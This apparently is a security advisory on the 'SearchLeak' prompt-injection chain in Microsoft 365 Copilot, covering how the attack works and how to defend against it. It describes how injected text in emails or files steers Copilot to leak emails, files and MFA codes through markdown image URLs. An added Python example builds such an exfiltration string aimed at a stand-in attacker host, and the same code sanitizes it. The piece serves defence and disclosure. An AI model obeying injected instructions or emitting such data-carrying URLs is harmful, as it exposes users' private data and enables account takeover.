
Microsoft 365 Copilot 'SearchLeak' CVE-2026-42824 — One-Click Exfiltration of Emails, Files, and MFA Codes

Varonis Threat Labs chained three vulnerabilities in Microsoft 365 Copilot into a single attack that exfiltrates emails, corporate files, and MFA authentication codes from a victim's account with a single click on a malicious link. Microsoft patched all three flaws server-side; no client update is required, but the disclosure illuminates the structural risks of embedding AI systems with broad data access into enterprise environments.


A chain of three vulnerabilities in Microsoft 365 Copilot, collectively tracked as CVE-2026-42824 and dubbed “SearchLeak” by Varonis Threat Labs, could be exploited to silently exfiltrate a victim’s emails, files, and multi-factor authentication codes in a single user interaction: clicking a link. Microsoft patched all three components server-side in mid-June 2026; no action is required from end users or enterprise administrators. The disclosure, however, raises substantive questions about the security model of AI systems granted ambient read access across the entirety of an organisation’s data.

The Attack Chain

The three vulnerabilities combined to form a complete exfiltration path:

Flaw 1 — Prompt injection via search results: Microsoft 365 Copilot’s enterprise search aggregates content from emails, SharePoint documents, Teams messages, and OneDrive files. An attacker who can place content in any of those locations — including simply sending an email that lands in the victim’s mailbox — can embed a prompt injection payload in it. When Copilot retrieves that content to answer a query, it has no reliable way to distinguish retrieved data from instructions, so the injected text is acted on as if it were part of the user’s request, with the signed-in user’s permissions.

Flaw 2 — Indirect data exfiltration via markdown rendering: The injected instruction tells Copilot to gather sensitive data — emails matching chosen keywords, recently accessed files, MFA codes delivered to the mailbox — and to include it in its markdown response inside an image reference whose URL points at an attacker-controlled server, with the data encoded in the URL. Because the Copilot client renders markdown and fetches referenced images automatically, the victim’s browser sends the data to the attacker with no further interaction.

Flaw 3 — One-click delivery: The chain could be started from a phishing link that triggers the Copilot interaction on the victim’s behalf, without the victim opening Copilot or typing a query. A single click on the link initiates the chain end to end.
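The exfiltration primitive in Flaw 2, and a render-time policy that defeats it, as an added Python example that is not part of the original article and is neither Microsoft’s nor Varonis’s code. `build_exfil_markdown` only reproduces the response shape the article describes (stolen values packed into an image URL), not any actual injected prompt; the collector host, the allowlisted CDN host, and the sample secrets are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Assumed allowlist: hosts the Copilot web client may load images from.
ALLOWED_IMAGE_HOSTS = frozenset({"cdn.example-tenant.com"})

# Markdown image syntax ![alt](url "title") and raw HTML <img>, which many
# markdown renderers pass through unchanged (a common sanitizer bypass).
MD_IMAGE_RE = re.compile(r'!\[([^\]]*)\]\(\s*<?([^\s)>]+)>?(?:\s+"[^"]*")?\s*\)')
HTML_IMG_RE = re.compile(r"<img\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.IGNORECASE)
PLACEHOLDER = "[image removed: untrusted source]"


def build_exfil_markdown(collector: str, leaked: dict) -> str:
    """Response shape an injected instruction asks the assistant to emit:
    the stolen values ride in an image URL's query string, so the browser
    leaks them to the collector the moment the markdown is rendered.
    (Constructed for this example; the collector host is fictional.)"""
    return f"Summary ready.\n\n![status]({collector}?{urlencode(leaked)})"


def classify(url: str):
    """Return (verdict, host, query_params) for one image URL."""
    parts = urlsplit(url.strip())
    host = (parts.hostname or "").lower()
    params = parse_qs(parts.query, keep_blank_values=True)
    if parts.scheme.lower() == "data":
        return "blocked:data-url", host, params      # inline payload; hides content, never trusted
    if not host:
        return "allowed:same-origin", host, params   # relative path, resolves to the app's own origin
    if host not in ALLOWED_IMAGE_HOSTS:
        return "blocked:external-host", host, params
    return "allowed", host, params


def sanitize_markdown(markdown: str):
    """Rewrite assistant output so no image load can carry data off-host.
    Returns (clean_markdown, findings); each finding records what the blocked
    request would have sent, which is what a SOC wants to see."""
    findings = []

    def decide(url: str):
        verdict, host, params = classify(url)
        if verdict.startswith("allowed"):
            # Allowlisted host: drop query and fragment so the URL cannot carry data.
            return urlsplit(url)._replace(query="", fragment="").geturl() if host else url
        findings.append({"verdict": verdict, "host": host, "params": params, "url": url})
        return None

    def sub_md(m):
        new = decide(m.group(2))
        return f"![{m.group(1)}]({new})" if new else PLACEHOLDER

    def sub_html(m):
        src = SRC_RE.search(m.group(0))
        url = next((g for g in src.groups() if g is not None), "") if src else ""
        new = decide(url) if url else None
        return f'<img src="{new}">' if new else PLACEHOLDER

    clean = MD_IMAGE_RE.sub(sub_md, markdown)
    clean = HTML_IMG_RE.sub(sub_html, clean)
    return clean, findings


if __name__ == "__main__":
    # Constructed sample of what a SearchLeak-style response would look like.
    poisoned = build_exfil_markdown(
        "https://collector.attacker.example/pixel.png",
        {"otp": "482913", "subject": "Re: merger terms"},
    )
    clean, findings = sanitize_markdown(poisoned)
    print(clean)
    for f in findings:
        print(f"blocked {f['verdict']} host={f['host']} would_have_sent={f['params']}")
```

The policy treats every remote image reference as a potential exfiltration channel: references to hosts outside the allowlist, and data: URLs, are replaced with a placeholder and recorded, and even allowlisted images lose their query string so a trusted host cannot be used as a carrier. The residual risk is an open redirect on an allowlisted host, or a path segment that encodes data, so the allowlist must contain only hosts the tenant itself controls.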

Why This Matters Beyond the Patch

Microsoft has resolved all three vulnerabilities; organisations using M365 Copilot are no longer exposed to this specific chain. The more durable concern is architectural.

Copilot operates with the signed-in user’s permissions across the full M365 tenancy — emails, files, Teams conversation history, and in many configurations, inbound MFA codes sent to email. This scope of access was designed to make Copilot maximally useful. It also means that any injection flaw in how Copilot handles retrieved content, even a short-lived one, reaches everything the user can read across the organisation’s data footprint.

SearchLeak is the fourth published prompt injection attack against M365 Copilot in 2026. Each followed the same structural pattern: ambient data access combined with inadequate input sanitisation creates a reliable exfiltration primitive. Patching the specific chain does not resolve the structural issue, which is that AI systems with broad read permissions are high-value targets for prompt injection regardless of which specific vectors are currently patched.

What Attackers Can Do with This Access

In a successful SearchLeak attack, an adversary could extract:

  • Emails matching attacker-specified keywords — contracts, M&A communications, PII, credentials
  • MFA codes from authentication emails in the inbox, enabling account takeover without knowing the password
  • SharePoint/OneDrive documents identified by the injected search query
  • Teams messages from recent conversations

The combination of MFA codes and email content provides a potential path to full account takeover without requiring any credential from the user.

Recommended Actions

  • No patching action required: Microsoft resolved all three components server-side, so there is nothing to deploy or verify in your tenant for this specific chain.
  • Review Copilot data access scope: assess which SharePoint sites, mailboxes, and sensitivity-labelled content Copilot can reach for users in your tenancy. Copilot honours the usage rights on Microsoft Purview sensitivity labels, so labels whose encryption does not grant the Extract right keep highly confidential content out of Copilot responses; Restricted SharePoint Search additionally limits Copilot’s retrieval to an administrator-curated allow list of sites. Both reduce the blast radius of future prompt injection chains.
  • Enable Microsoft 365 audit logging: Copilot interactions are recorded in the Unified Audit Log under the CopilotInteraction record type (retrievable with Search-UnifiedAuditLog -RecordType CopilotInteraction), including which resources each interaction accessed. Without that logging, SearchLeak-style attacks are invisible to the security team.
  • Monitor for emerging prompt injection disclosures: the pattern of Copilot prompt injection is sufficiently established that future vulnerabilities are probable. Subscribe to MSRC advisories for M365 Copilot specifically.
  • Evaluate data access governance before expanding Copilot deployment: if Copilot is in pilot, conduct a permissions audit before rolling it out to users with access to privileged financial, legal, or HR data.
